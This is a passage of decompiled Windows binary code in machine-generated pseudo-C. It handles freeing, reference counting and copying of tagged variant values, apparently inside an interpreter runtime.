																										L228:
																										_t1398 = _v128;
																										_push(_v156);
																										E00AA10FC();
																										_t1809 = _t1809 + 4;
																										 *0xb37f38 = _v160;
																										 *0xb37f3d = 0;
																										L229:
																										 *0xb37f34 =  *0xb37f34 - 1;
																										 *((intOrPtr*)(_a4 + 0x148)) = _v8;
																										_t1023 = _v56;
																										__eflags = _t1023;
																										if(_t1023 != 0) {
																											E00AD651E(_t1023);
																											_v60 = 0;
																										}
																										_t1025 = _v60;
																										__eflags = _t1025 - 8;
																										if(_t1025 == 8) {
																											_t1772 = _v68;
																											__eflags = _t1772;
																											if(_t1772 != 0) {
																												_push(_t1772);
																												__imp__#9();
																												_push(_t1772);
																												E00AA10FC();
																												_t1809 = _t1809 + 4;
																											}
																										} else {
																											__eflags = _t1025 - 0xa;
																											if(_t1025 == 0xa) {
																												_t1073 = _v68;
																												__eflags = _t1073;
																												if(_t1073 != 0) {
																													E00AD30B0(_t1073);
																												}
																											} else {
																												__eflags = _t1025 - 5;
																												if(_t1025 == 5) {
																													E00A9E470( &_v68, _t1771);
																												} else {
																													__eflags = _t1025 - 0xb;
																													if(_t1025 == 0xb) {
																														_t1776 = _v68;
																														_push( *((intOrPtr*)(_t1776 + 4)));
																														E00AA10FC();
																														_push(_t1776);
																														E00AA10FC();
																														_t1809 = _t1809 + 8;
																													} else {
																														__eflags = _t1025 - 0xc;
																														if(_t1025 == 0xc) {
																															_t1079 = _v68;
																															__eflags = _t1079;
																															if(_t1079 != 0) {
																																E00ADB350(_t1079);
																															}
																														}
																													}
																												}
																											}
																										}
																										_t1026 = _v88;
																										_t1773 = _v92;
																										_t1460 = 0;
																										_v60 = 1;
																										_v68 = 0;
																										__eflags = _t1026;
																										if(_t1026 != 0) {
																											E00AD651E(_t1026);
																											_v92 = 0;
																											_t1623 = 1;
																											_t1460 = 0;
																										}
																										__eflags = _t1773 - 8;
																										if(_t1773 == 8) {
																											__eflags = _v100 - _t1460;
																											if(_v100 != _t1460) {
																												_t1773 = _v100;
																												_push(_t1773);
																												__imp__#9();
																												_push(_t1773);
																												E00AA10FC();
																												_t1809 = _t1809 + 4;
																												_t1623 = 1;
																												_t1460 = 0;
																											}
																										} else {
																											__eflags = _t1773 - 0xa;
																											if(_t1773 == 0xa) {
																												__eflags = _v100 - _t1460;
																												if(_v100 != _t1460) {
																													E00AD30B0(_v100);
																													_t1623 = 1;
																													_t1460 = 0;
																												}
																											} else {
																												__eflags = _t1773 - 5;
																												if(_t1773 == 5) {
																													E00A9E470( &_v100, _t1773);
																													_t1623 = 1;
																													_t1460 = 0;
																												} else {
																													__eflags = _t1773 - 0xb;
																													if(_t1773 == 0xb) {
																														_t1773 = _v100;
																														_push( *((intOrPtr*)(_t1773 + 4)));
																														E00AA10FC();
																														_push(_t1773);
																														E00AA10FC();
																														_t1809 = _t1809 + 8;
																														_t1623 = 1;
																														_t1460 = 0;
																													} else {
																														__eflags = _t1773 - 0xc;
																														if(_t1773 == 0xc) {
																															__eflags = _v100 - _t1460;
																															if(_v100 != _t1460) {
																																E00ADB350(_v100);
																																_t1623 = 1;
																																_t1460 = 0;
																															}
																														}
																													}
																												}
																											}
																										}
																										_t1028 = _v184;
																										__eflags = _t1028 - _t1460;
																										if(_t1028 != _t1460) {
																											E00AD651E(_t1028);
																											_v188 = 0;
																											_t1623 = 1;
																											_t1460 = 0;
																										}
																										_t1030 = _v188;
																										__eflags = _t1030 - 8;
																										if(_t1030 == 8) {
																											_t1031 = _v196;
																											__eflags = _t1031 - _t1460;
																											if(_t1031 != _t1460) {
																												_push(_t1031);
																												__imp__#9();
																												_push(_v200);
																												E00AA10FC();
																												_t1809 = _t1809 + 4;
																												_t1623 = 1;
																												_t1460 = 0;
																											}
																										} else {
																											__eflags = _t1030 - 0xa;
																											if(_t1030 == 0xa) {
																												_t1055 = _v196;
																												__eflags = _t1055 - _t1460;
																												if(_t1055 != _t1460) {
																													E00AD30B0(_t1055);
																													_t1623 = 1;
																													_t1460 = 0;
																												}
																											} else {
																												__eflags = _t1030 - 5;
																												if(_t1030 == 5) {
																													E00A9E470( &_v196, _t1773);
																													_t1623 = 1;
																													_t1460 = 0;
																												} else {
																													__eflags = _t1030 - 0xb;
																													if(_t1030 == 0xb) {
																														_push( *(_v196 + 4));
																														E00AA10FC();
																														_push(_v196);
																														E00AA10FC();
																														_t1809 = _t1809 + 8;
																														_t1623 = 1;
																														_t1460 = 0;
																													} else {
																														__eflags = _t1030 - 0xc;
																														if(_t1030 == 0xc) {
																															_t1062 = _v196;
																															__eflags = _t1062 - _t1460;
																															if(_t1062 != _t1460) {
																																E00ADB350(_t1062);
																																_t1623 = 1;
																																_t1460 = 0;
																															}
																														}
																													}
																												}
																											}
																										}
																										_v188 = _t1623;
																										_v196 = _t1460;
																										__eflags = _t1735 - _t1460;
																										if(_t1735 <= _t1460) {
																											L250:
																											_push(_v128);
																											E00AA10FC();
																											_t1811 = _t1809 + 4;
																											__eflags = _v172;
																											if(_v172 <= 0) {
																												L263:
																												_push(_v176);
																												E00AA10FC();
																												_t946 = 0;
																												__eflags = 0;
																												goto L264;
																											} else {
																												_t1399 = 0;
																												__eflags = 0;
																												do {
																													_t1774 =  *(_v176 + _t1399 * 4);
																													__eflags = _t1774;
																													if(_t1774 == 0) {
																														goto L262;
																													}
																													_t1736 =  *(_t1774 + 0xc);
																													__eflags = _t1736;
																													if(_t1736 != 0) {
																														 *( *(_t1736 + 0xc)) =  *( *(_t1736 + 0xc)) - 1;
																														__eflags =  *( *(_t1736 + 0xc));
																														if( *( *(_t1736 + 0xc)) == 0) {
																															_push( *_t1736);
																															E00AA10FC();
																															_push( *(_t1736 + 0xc));
																															E00AA10FC();
																															_t1811 = _t1811 + 8;
																														}
																														_push(_t1736);
																														E00AA10FC();
																														_t1811 = _t1811 + 4;
																														 *(_t1774 + 0xc) = 0;
																													}
																													_t1035 =  *(_t1774 + 8);
																													__eflags = _t1035 - 8;
																													if(_t1035 == 8) {
																														_t1461 =  *_t1774;
																														__eflags = _t1461;
																														if(_t1461 == 0) {
																															goto L257;
																														}
																														_push(_t1461);
																														__imp__#9();
																														_push( *_t1774);
																														E00AA10FC();
																														_t1811 = _t1811 + 4;
																														goto L261;
																													} else {
																														L257:
																														__eflags = _t1035 - 0xa;
																														if(_t1035 == 0xa) {
																															_t1036 =  *_t1774;
																															__eflags = _t1036;
																															if(_t1036 != 0) {
																																E00AD30B0(_t1036);
																															}
																														} else {
																															__eflags = _t1035 - 5;
																															if(_t1035 == 5) {
																																E00A9E470(_t1774, _t1774);
																															} else {
																																__eflags = _t1035 - 0xb;
																																if(_t1035 == 0xb) {
																																	_push( *((intOrPtr*)( *_t1774 + 4)));
																																	E00AA10FC();
																																	_push( *_t1774);
																																	E00AA10FC();
																																	_t1811 = _t1811 + 8;
																																} else {
																																	__eflags = _t1035 - 0xc;
																																	if(_t1035 == 0xc) {
																																		_t1044 =  *_t1774;
																																		__eflags = _t1044;
																																		if(_t1044 != 0) {
																																			E00ADB350(_t1044);
																																		}
																																	}
																																}
																															}
																														}
																														L261:
																														_push(_t1774);
																														 *(_t1774 + 8) = 1;
																														 *_t1774 = 0;
																														E00AA10FC();
																														_t1811 = _t1811 + 4;
																													}
																													L262:
																													_t1399 = _t1399 + 1;
																													__eflags = _t1399 - _v172;
																												} while (_t1399 < _v172);
																												goto L263;
																											}
																										} else {
																											_t1775 = 0;
																											__eflags = 0;
																											do {
																												_push( *((intOrPtr*)(_t1398 + _t1775 * 4)));
																												E00AA10FC();
																												_t1775 = _t1775 + 1;
																												_t1809 = _t1809 + 4;
																												__eflags = _t1775 - _t1735;
																											} while (_t1775 < _t1735);
																											goto L250;
																										}
																									} else {
																										_t1082 =  *(_t1771 + 0x18);
																										_t1400 = _t1458;
																										__eflags = _t1082;
																										if(_t1082 != 0) {
																											E00A9B650(_t1400, _t1458, _t1735, _t1082);
																										}
																										_t1083 =  *(_t1771 + 0x1c);
																										__eflags = _t1083;
																										if(_t1083 != 0) {
																											E00A9B650(_t1400, _t1400, _t1735, _t1083);
																										}
																										__eflags =  *((char*)(_t1771 + 0x10));
																										if( *((char*)(_t1771 + 0x10)) != 0) {
																											L225:
																											 *( *(_t1771 + 0xc)) =  *( *(_t1771 + 0xc)) - 1;
																											__eflags =  *( *(_t1771 + 0xc));
																											if( *( *(_t1771 + 0xc)) == 0) {
																												_push( *_t1771);
																												E00AA10FC();
																												_push( *(_t1771 + 0xc));
																												E00AA10FC();
																												_t1809 = _t1809 + 8;
																											}
																											_push(_t1771);
																											E00AA10FC();
																											_t1735 = _v124;
																											_t1809 = _t1809 + 4;
																											goto L228;
																										} else {
																											_t1401 =  *(_t1771 + 0x14);
																											__eflags = _t1401;
																											if(_t1401 == 0) {
																												goto L225;
																											}
																											_t1737 =  *(_t1401 + 0xc);
																											__eflags = _t1737;
																											if(_t1737 != 0) {
																												 *( *(_t1737 + 0xc)) =  *( *(_t1737 + 0xc)) - 1;
																												__eflags =  *( *(_t1737 + 0xc));
																												if( *( *(_t1737 + 0xc)) == 0) {
																													_push( *_t1737);
																													E00AA10FC();
																													_push( *(_t1737 + 0xc));
																													E00AA10FC();
																													_t1809 = _t1809 + 8;
																												}
																												_push(_t1737);
																												E00AA10FC();
																												_t1809 = _t1809 + 4;
																												 *(_t1401 + 0xc) = 0;
																											}
																											_t1090 =  *(_t1401 + 8);
																											__eflags = _t1090 - 8;
																											if(_t1090 == 8) {
																												_t1471 =  *_t1401;
																												__eflags = _t1471;
																												if(_t1471 == 0) {
																													goto L220;
																												}
																												_push(_t1471);
																												__imp__#9();
																												_push( *_t1401);
																												E00AA10FC();
																												_t1809 = _t1809 + 4;
																												goto L224;
																											} else {
																												L220:
																												__eflags = _t1090 - 0xa;
																												if(_t1090 == 0xa) {
																													_t1091 =  *_t1401;
																													__eflags = _t1091;
																													if(_t1091 != 0) {
																														E00AD30B0(_t1091);
																													}
																												} else {
																													__eflags = _t1090 - 5;
																													if(_t1090 == 5) {
																														E00A9E470(_t1401, _t1771);
																													} else {
																														__eflags = _t1090 - 0xb;
																														if(_t1090 == 0xb) {
																															_push( *((intOrPtr*)( *_t1401 + 4)));
																															E00AA10FC();
																															_push( *_t1401);
																															E00AA10FC();
																															_t1809 = _t1809 + 8;
																														} else {
																															__eflags = _t1090 - 0xc;
																															if(_t1090 == 0xc) {
																																_t1099 =  *_t1401;
																																__eflags = _t1099;
																																if(_t1099 != 0) {
																																	E00ADB350(_t1099);
																																}
																															}
																														}
																													}
																												}
																												L224:
																												_push(_t1401);
																												 *(_t1401 + 8) = 1;
																												 *_t1401 = 0;
																												E00AA10FC();
																												_t1809 = _t1809 + 4;
																												goto L225;
																											}
																										}
																									}
																								}
																							case 5:
																								__ecx = _v68;
																								 *__ebx = __ecx;
																								goto L204;
																							case 6:
																								__esi = _v68;
																								__eflags = __esi;
																								if(__eflags != 0) {
																									_push(0x10);
																									__eax = E00AA14F7(__edi, __esi, __eflags);
																									__esp = __esp + 4;
																									_push(__eax);
																									 *__ebx = __eax;
																									__imp__#8();
																									__edx =  *__ebx;
																									_push(__esi);
																									_push( *__ebx);
																									__imp__#10();
																									__eflags = __eax;
																									if(__eax < 0) {
																										__eax =  *__ebx;
																										_push( *__ebx);
																										__imp__#9();
																										__ecx =  *__ebx;
																										_push( *__ebx);
																										__eax = E00AA10FC();
																										__esp = __esp + 4;
																										 *__ebx = 0;
																									}
																								}
																								goto L204;
																							case 7:
																								 *__ebx = _v68;
																								goto L204;
																							case 8:
																								_push(0x18);
																								__eax = E00AA14F7(__edi, __esi, __eflags);
																								__esp = __esp + 4;
																								__eflags = __eax;
																								if(__eax == 0) {
																									goto L567;
																								}
																								__ecx = _v68;
																								__eax = E00ADB82F(__eax, _v68);
																								goto L203;
																							case 9:
																								_push(8);
																								__eax = E00AA14F7(__edi, __esi, __eflags);
																								__esi = _v68;
																								 *__ebx = __eax;
																								__edx =  *__esi;
																								 *__eax =  *__esi;
																								__eax =  *__ebx;
																								__eax =  *( *__ebx);
																								__esp = __esp + 4;
																								__eflags = __eax;
																								if(__eflags == 0) {
																									_push(1);
																									__eax = E00AA14F7(__edi, __esi, __eflags);
																									__edx =  *__ebx;
																									 *( *__ebx + 4) = __eax;
																									__eax =  *__ebx;
																									__ecx =  *(__eax + 4);
																									__esp = __esp + 4;
																									 *__ecx = 0;
																								} else {
																									_push(__eax);
																									__eax = E00AA14F7(__edi, __esi, __eflags);
																									__ecx =  *__ebx;
																									 *( *__ebx + 4) = __eax;
																									__ebx =  *__ebx;
																									__edx =  *__ebx;
																									__eax =  *(__esi + 4);
																									__ecx = __ebx[1];
																									__esp = __esp + 4;
																									__eax = E00AA0D80(__ebx[1],  *(__esi + 4),  *__ebx);
																								}
																								goto L204;
																							case 0xa:
																								_push(0x14);
																								__eax = E00AA14F7(__edi, __esi, __eflags);
																								__esp = __esp + 4;
																								__eflags = __eax;
																								if(__eax == 0) {
																									L567:
																									__eax = 0;
																									L203:
																									 *_t1397 = _t1116;
																									goto L204;
																								}
																								__edx = _v68;
																								__eax = E00B0082A(__eax, _v68);
																								goto L203;
																						}
																					}
																					L202:
																					_t1116 = _v68;
																					goto L203;
																				}
																			}
																		}
																		_t1126 =  *(_t1771 + 0x2c);
																		__eflags = _t1126;
																		if(_t1126 != 0) {
																			E00AD651E(_t1126);
																			 *(_t1771 + 0x2c) = 0;
																		}
																		_t1128 =  *(_t1771 + 0x28);
																		__eflags = _t1128 - 8;
																		if(_t1128 == 8) {
																			_t1477 =  *(_t1771 + 0x20);
																			__eflags = _t1477;
																			if(_t1477 == 0) {
																				goto L176;
																			}
																			__imp__#9(_t1477);
																			_push( *(_t1771 + 0x20));
																			E00AA10FC();
																			_t1809 = _t1809 + 4;
																			goto L180;
																		} else {
																			L176:
																			__eflags = _t1128 - 0xa;
																			if(_t1128 == 0xa) {
																				_t1129 =  *(_t1771 + 0x20);
																				__eflags = _t1129;
																				if(_t1129 != 0) {
																					E00AD30B0(_t1129);
																				}
																			} else {
																				__eflags = _t1128 - 5;
																				if(_t1128 == 5) {
																					_t851 = _t1771 + 0x20; // 0x67
																					E00A9E470(_t851, _t1771);
																				} else {
																					__eflags = _t1128 - 0xb;
																					if(_t1128 == 0xb) {
																						_push( *((intOrPtr*)( *(_t1771 + 0x20) + 4)));
																						E00AA10FC();
																						_push( *(_t1771 + 0x20));
																						E00AA10FC();
																						_t1809 = _t1809 + 8;
																					} else {
																						__eflags = _t1128 - 0xc;
																						if(_t1128 == 0xc) {
																							_t1153 =  *(_t1771 + 0x20);
																							__eflags = _t1153;
																							if(_t1153 != 0) {
																								E00ADB350(_t1153);
																							}
																						}
																					}
																				}
																			}
																			L180:
																			 *(_t1771 + 0x28) = 1;
																			 *(_t1771 + 0x20) = 0;
																			_t1402 =  *(_t1771 + 0xc);
																			__eflags = _t1402;
																			if(_t1402 != 0) {
																				 *( *(_t1402 + 0xc)) =  *( *(_t1402 + 0xc)) - 1;
																				__eflags =  *( *(_t1402 + 0xc));
																				if( *( *(_t1402 + 0xc)) == 0) {
																					_push( *_t1402);
																					E00AA10FC();
																					_push( *(_t1402 + 0xc));
																					E00AA10FC();
																					_t1809 = _t1809 + 8;
																				}
																				_push(_t1402);
																				E00AA10FC();
																				_t1809 = _t1809 + 4;
																				 *(_t1771 + 0xc) = 0;
																			}
																			_t1130 =  *(_t1771 + 8);
																			__eflags = _t1130 - 8;
																			if(_t1130 == 8) {
																				_t1478 =  *_t1771;
																				__eflags = _t1478;
																				if(_t1478 == 0) {
																					goto L184;
																				}
																				__imp__#9(_t1478);
																				_push( *_t1771);
																				E00AA10FC();
																				_t1809 = _t1809 + 4;
																				goto L188;
																			} else {
																				L184:
																				__eflags = _t1130 - 0xa;
																				if(_t1130 == 0xa) {
																					_t1131 =  *_t1771;
																					__eflags = _t1131;
																					if(_t1131 != 0) {
																						E00AD30B0(_t1131);
																					}
																				} else {
																					__eflags = _t1130 - 5;
																					if(_t1130 == 5) {
																						E00A9E470(_t1771, _t1771);
																					} else {
																						__eflags = _t1130 - 0xb;
																						if(_t1130 == 0xb) {
																							_push( *((intOrPtr*)( *_t1771 + 4)));
																							E00AA10FC();
																							_push( *_t1771);
																							E00AA10FC();
																							_t1809 = _t1809 + 8;
																						} else {
																							__eflags = _t1130 - 0xc;
																							if(_t1130 == 0xc) {
																								_t1139 =  *_t1771;
																								__eflags = _t1139;
																								if(_t1139 != 0) {
																									E00ADB350(_t1139);
																								}
																							}
																						}
																					}
																				}
																				L188:
																				_push(_t1771);
																				 *(_t1771 + 8) = 1;
																				 *_t1771 = 0;
																				E00AA10FC();
																				_t1396 = _a4;
																				_t1809 = _t1809 + 4;
																				goto L189;
																			}
																		}
																	}
																} else {
																	_t1160 =  *(_t1403 + 0xc);
																	__eflags = _t1160;
																	if(_t1160 != 0) {
																		E00AD651E(_t1160);
																		 *(_t1403 + 0xc) = 0;
																	}
																	_t1162 =  *(_t1403 + 8);
																	__eflags = _t1162 - 8;
																	if(_t1162 == 8) {
																		_t1485 =  *_t1403;
																		__eflags = _t1485;
																		if(_t1485 == 0) {
																			goto L158;
																		}
																		__imp__#9(_t1485);
																		_push( *_t1403);
																		E00AA10FC();
																		_t1809 = _t1809 + 4;
																		goto L162;
																	} else {
																		L158:
																		__eflags = _t1162 - 0xa;
																		if(_t1162 == 0xa) {
																			_t1163 =  *_t1403;
																			__eflags = _t1163;
																			if(_t1163 != 0) {
																				E00AD30B0(_t1163);
																			}
																		} else {
																			__eflags = _t1162 - 5;
																			if(_t1162 == 5) {
																				E00A9E470(_t1403, _t1777);
																			} else {
																				__eflags = _t1162 - 0xb;
																				if(_t1162 == 0xb) {
																					_push( *((intOrPtr*)( *_t1403 + 4)));
																					E00AA10FC();
																					_push( *_t1403);
																					E00AA10FC();
																					_t1809 = _t1809 + 8;
																				} else {
																					__eflags = _t1162 - 0xc;
																					if(_t1162 == 0xc) {
																						_t1173 =  *_t1403;
																						__eflags = _t1173;
																						if(_t1173 != 0) {
																							E00ADB350(_t1173);
																						}
																					}
																				}
																			}
																		}
																		L162:
																		 *(_t1403 + 8) = 1;
																		 *_t1403 = 0;
																		_t1164 =  *(_t1777 + 8);
																		 *(_t1403 + 8) = _t1164;
																		__eflags = _t1164 - 4;
																		if(__eflags != 0) {
																			_t1165 = _t1164 - 1;
																			__eflags = _t1165 - 0xb;
																			if(__eflags > 0) {
																				goto L166;
																			}
																			switch( *((intOrPtr*)(_t1165 * 4 +  &M00ABAE62))) {
																				case 0:
																					__eax =  *__esi;
																					 *__ebx = __eax;
																					goto L166;
																				case 1:
																					 *_t1403 =  *_t1777;
																					 *((intOrPtr*)(_t1403 + 4)) =  *((intOrPtr*)(_t1777 + 4));
																					goto L166;
																				case 2:
																					__fp0 =  *__esi;
																					 *__ebx =  *__esi;
																					goto L166;
																				case 3:
																					goto L163;
																				case 4:
																					_push(0x214);
																					__eax = E00AA14F7(__edi, __esi, __eflags);
																					__esp = __esp + 4;
																					__eflags = __eax;
																					if(__eax == 0) {
																						__eax = 0;
																						__eflags = 0;
																					} else {
																						__esi =  *__esi;
																						__ecx = 0x85;
																						__edi = __eax;
																						__eax = memcpy(__eax, __esi, 0x85 << 2);
																						__esi + __ecx = __esi + __ecx + __ecx;
																						__ecx = 0;
																					}
																					 *__ebx = __eax;
																					__eflags =  *(__eax + 4);
																					if( *(__eax + 4) != 0) {
																						__eax =  *(__eax + 4);
																						 *__eax =  *__eax + 1;
																						__eflags =  *__eax;
																					}
																					goto L495;
																				case 5:
																					__ecx =  *__esi;
																					 *__ebx = __ecx;
																					goto L166;
																				case 6:
																					__eflags =  *__esi;
																					if(__eflags == 0) {
																						L495:
																						__edi = _a4;
																						goto L166;
																					}
																					_push(0x10);
																					__eax = E00AA14F7(__edi, __esi, __eflags);
																					__esp = __esp + 4;
																					_push(__eax);
																					 *__ebx = __eax;
																					__imp__#8();
																					__edx =  *__esi;
																					__eax =  *__ebx;
																					_push( *__esi);
																					_push(__eax);
																					__imp__#10();
																					__eflags = __eax;
																					if(__eax < 0) {
																						__ecx =  *__ebx;
																						_push( *__ebx);
																						__imp__#9();
																						__edx =  *__ebx;
																						_push( *__ebx);
																						__eax = E00AA10FC();
																						__esp = __esp + 4;
																						 *__ebx = 0;
																					}
																					goto L166;
																				case 7:
																					 *__ebx =  *__esi;
																					goto L166;
																				case 8:
																					_push(0x18);
																					__eax = E00AA14F7(__edi, __esi, __eflags);
																					__esp = __esp + 4;
																					__eflags = __eax;
																					if(__eax == 0) {
																						goto L502;
																					}
																					__ecx =  *__esi;
																					__eax = E00ADB82F(__eax,  *__esi);
																					 *__ebx = __eax;
																					goto L166;
																				case 9:
																					_push(8);
																					__eax = E00AA14F7(__edi, __esi, __eflags);
																					 *__ebx = __eax;
																					__edx =  *__esi;
																					__ecx =  *( *__esi);
																					 *__eax =  *( *__esi);
																					__edx =  *__ebx;
																					__eax =  *( *__ebx);
																					__esp = __esp + 4;
																					__eflags = __eax;
																					if(__eflags == 0) {
																						_push(1);
																						__eax = E00AA14F7(__edi, __esi, __eflags);
																						__ecx =  *__ebx;
																						 *(__ecx + 4) = __eax;
																						__edx =  *__ebx;
																						__eax =  *( *__ebx + 4);
																						__esp = __esp + 4;
																						 *__eax = 0;
																					} else {
																						_push(__eax);
																						__eax = E00AA14F7(__edi, __esi, __eflags);
																						__ecx =  *__ebx;
																						 *( *__ebx + 4) = __eax;
																						__ebx =  *__ebx;
																						__edx =  *__ebx;
																						__eax =  *__esi;
																						__ecx =  *( *__esi + 4);
																						__esp = __esp + 4;
																						__edx = __ebx[1];
																						__eax = E00AA0D80(__ebx[1],  *( *__esi + 4),  *__ebx);
																					}
																					goto L166;
																				case 0xa:
																					_push(0x14);
																					__eax = E00AA14F7(__edi, __esi, __eflags);
																					__esp = __esp + 4;
																					__eflags = __eax;
																					if(__eax == 0) {
																						L502:
																						__eax = 0;
																						 *__ebx = 0;
																						goto L166;
																					}
																					__ecx =  *__esi;
																					__eax = E00B0082A(__eax,  *__esi);
																					 *__ebx = __eax;
																					goto L166;
																			}
																		}
																		L163:
																		_push(0x10);
																		_t1166 = E00AA14F7(_t1733, _t1777, __eflags);
																		_t1809 = _t1809 + 4;
																		__eflags = _t1166;
																		if(_t1166 == 0) {
																			_t1166 = 0;
																		} else {
																			_t1487 =  *(_t1777 + 0xc);
																			 *_t1166 =  *_t1487;
																			 *((intOrPtr*)(_t1166 + 4)) =  *((intOrPtr*)(_t1487 + 4));
																			 *((intOrPtr*)(_t1166 + 8)) =  *((intOrPtr*)(_t1487 + 8));
																			_t1488 =  *(_t1487 + 0xc);
																			 *(_t1166 + 0xc) = _t1488;
																			 *_t1488 =  *_t1488 + 1;
																			__eflags =  *_t1488;
																		}
																		 *(_t1403 + 0xc) = _t1166;
																		goto L166;
																	}
																}
															}
														}
													} else {
														_v108 = 1;
														goto L70;
														L71:
														__eflags = _v108 - _v116;
														if(_v108 > _v116) {
															E00A9D740( &_v40, _t1493);
															_v104 = 0;
															_t1179 =  *((intOrPtr*)( *(_v148 + 4) + 8 + _t1778 * 4));
															_t1495 =  *( *((intOrPtr*)( *(_v148 + 4) + 8 + _t1778 * 4)) + 8) & 0x0000ffff;
															__eflags = _t1495 - 0x4a;
															if(_t1495 == 0x4a) {
																L381:
																E00A929B0(_t1179, _t1495,  &_v40);
																_t1495 =  *(_v148 + 4);
																_t1179 =  *((intOrPtr*)( *(_v148 + 4) + 0xc + _v212 * 4));
																L382:
																E00A929B0(_t1179, _t1495,  &_v40);
																E00A92940(0x7f,  &_v20, _t1851);
																E00A929B0( &_v20, _t1495,  &_v40);
																E00A9A9D0(_a4, _t1851,  &_v40,  &_v104,  &_v196, 0xffffffff);
																_v172 = _v228 + _v228 + _v228 + _v228;
																E00A91BE0(1, _v224 | 0x00000200,  &_v212,  *((intOrPtr*)( *((intOrPtr*)(_v228 + _v228 + _v228 + _v228 +  *((intOrPtr*)(_v164 + 4)))))));
																L140:
																_t1193 =  *(_v148 + 4);
																_t1611 =  *(_v156 + _t1193 + 4);
																__eflags =  *(_t1611 + 8) - 0x41;
																if( *(_t1611 + 8) == 0x41) {
																	_t1611 =  *(_t1193 + 8 + _v212 * 4);
																	_t1194 =  *(_t1611 + 8) & 0x0000ffff;
																	__eflags = _t1194 - 0x4a;
																	if(_t1194 == 0x4a) {
																		L459:
																		_v212 = _v212 + 5;
																		goto L142;
																	}
																	__eflags = _t1194 - 0x49;
																	if(_t1194 == 0x49) {
																		goto L459;
																	}
																	_v212 = _v212 + 4;
																	goto L142;
																} else {
																	_t279 =  &_v212;
																	 *_t279 = _v212 + 2;
																	__eflags =  *_t279;
																	L142:
																	_t1195 = _v12;
																	_v200 = _v200 + 1;
																	__eflags = _t1195 - 0x30;
																	if(_t1195 >= 0x30) {
																		__eflags = _t1195 - 0x3f;
																		if(_t1195 <= 0x3f) {
																			_t1202 = _v20;
																			__eflags = _t1202;
																			if(_t1202 != 0) {
																				E00AD651E(_t1202);
																			}
																		}
																	}
																	__eflags = _v32;
																	_v40 = 0xb15a44;
																	if(_v32 > 0) {
																		_t1782 = 0;
																		__eflags = 0;
																		do {
																			_t1197 =  *(_v36 + _t1782 * 4);
																			__eflags = _t1197;
																			if(_t1197 != 0) {
																				E00ADC736(_t1197);
																			}
																			_t1782 = _t1782 + 1;
																			__eflags = _t1782 - _v32;
																		} while (_t1782 < _v32);
																		goto L144;
																	} else {
																		L144:
																		_push(_v36);
																		_v32 = 0;
																		E00AA10FC();
																		_t1200 = _v108 + 1;
																		_t1809 = _t1809 + 4;
																		_v108 = _t1200;
																		__eflags = _t1200 - _v136;
																		if(_t1200 <= _v136) {
																			L70:
																			_t1493 =  *(_v148 + 4);
																			_t1778 = _v212;
																			_v12 = _t1611 | 0xffffffff;
																			_v40 = 0xb15a44;
																			_v36 = 0;
																			_v32 = 0;
																			_v28 = 0;
																			_v104 = 0;
																			_t1738 =  *(_t1493 + _t1778 * 4);
																			_t1652 = _t1493 + _t1778 * 4;
																			_t1177 = 0;
																			_v10 = 0;
																			_v208 = 0;
																			__eflags =  *(_t1738 + 8);
																			if( *(_t1738 + 8) == 0) {
																				do {
																					goto L371;
																					L375:
																					_t1741 =  *_t1652;
																					__eflags =  *(_t1741 + 8);
																				} while ( *(_t1741 + 8) == 0);
																				_v212 = _t1778;
																			}
																			goto L71;
																		} else {
																			_t1393 = _v24;
																			goto L146;
																		}
																	}
																}
															}
															__eflags = _t1495 - 0x49;
															if(_t1495 != 0x49) {
																goto L382;
															}
															goto L381;
														}
														_t1746 = _v128;
														_t1660 = _v200;
														_t1204 = _t1177 | 0x00000200;
														__eflags =  *( *(_t1746 + _t1660 * 4));
														if( *( *(_t1746 + _t1660 * 4)) != 0) {
															_t1728 = _v176;
															_t1611 =  *(_v176 + _t1660 * 4);
															_t1207 = E00AEF4F5( *( *(_t1493 + _t1778 * 4)), E00AC24D9(_t1611), _t1204, 1);
															__eflags = _t1207;
															if(_t1207 == 0) {
																E00AEE724(_t1851, _a4, 0x79,  *((short*)( *((intOrPtr*)( *(_v148 + 4) + _t1778 * 4)) + 0xa)));
																E00ADB3F5(__eflags,  &_v32);
																E00A911A0( &_v56, _t1728, _t1778);
																goto L625;
															}
															_v212 = _t1778 + 2;
															goto L142;
														}
														_t1664 =  *((intOrPtr*)(_v176 + _v200 * 4));
														_t1785 = _t1204;
														_t1215 = _v212 + _v212 + _v212 + _v212;
														_v156 = _t1215;
														_t1748 =  *( *(_t1215 + _t1493));
														__eflags =  *0xb37f34; // 0x0
														if(__eflags == 0) {
															E00A94040(_t1748, _t1493, _t1664, 0xb37f24, _t1785, __eflags, _t1664, _t1785);
															goto L140;
														}
														_v204 = _t1664;
														__eflags =  *0xb37f3d; // 0x0
														if(__eflags != 0) {
															_t1507 =  *0xb37f38; // 0x0
															_t1406 =  *(_t1507 + 8);
														} else {
															_t1406 =  *0xb37f38; // 0x0
														}
														_t1219 = 0;
														_v208 = _t1406;
														__eflags =  *_t1406;
														if(__eflags == 0) {
															L94:
															_t1786 = _t1785 & 0x0000ff00;
															_push(0x20);
															_v160 = _t1785 & 0x0000ff00;
															_t1220 = E00AA14F7(_t1748, _t1785 & 0x0000ff00, __eflags);
															_t1826 = _t1809 + 4;
															__eflags = _t1220;
															if(__eflags == 0) {
																_t1407 = 0;
															} else {
																_t1786 = _t1220;
																 *(_t1786 + 8) = 8;
																 *(_t1786 + 4) = 0;
																_push( ~(0 | __eflags > 0x00000000) | 0x10);
																_t1265 = E00AA14F7(_t1748, _t1786, __eflags);
																 *_t1786 = _t1265;
																_push(4);
																 *_t1265 = 0;
																_t1266 = E00AA14F7(_t1748, _t1786, __eflags);
																_t1826 = _t1826 + 8;
																__eflags = _t1266;
																if(_t1266 == 0) {
																	_t1266 = 0;
																} else {
																	 *_t1266 = 1;
																}
																 *(_t1786 + 0xc) = _t1266;
																_t1407 = _t1786;
															}
															__eflags = _t1407 - _t1748;
															if(__eflags != 0) {
																_t1252 =  *(_t1407 + 0xc);
																__eflags =  *_t1252 - 1;
																if(__eflags > 0) {
																	 *_t1252 =  *_t1252 - 1;
																	 *(_t1407 + 4) = _t1748[1];
																	 *(_t1407 + 8) = _t1748[2];
																	 *_t1407 =  *_t1748;
																	_t1748 = _t1748[3];
																	 *(_t1407 + 0xc) = _t1748;
																	 *_t1748 =  *_t1748 + 1;
																} else {
																	_t1786 = _t1748[1];
																	_t222 = _t1786 + 1; // 0x1
																	_t1254 = _t222;
																	 *(_t1407 + 4) = _t1786;
																	__eflags =  *(_t1407 + 8) - _t1254;
																	if( *(_t1407 + 8) < _t1254) {
																		 *(_t1407 + 8) = E00AD653C(_t1254);
																		_t1256 =  *_t1407;
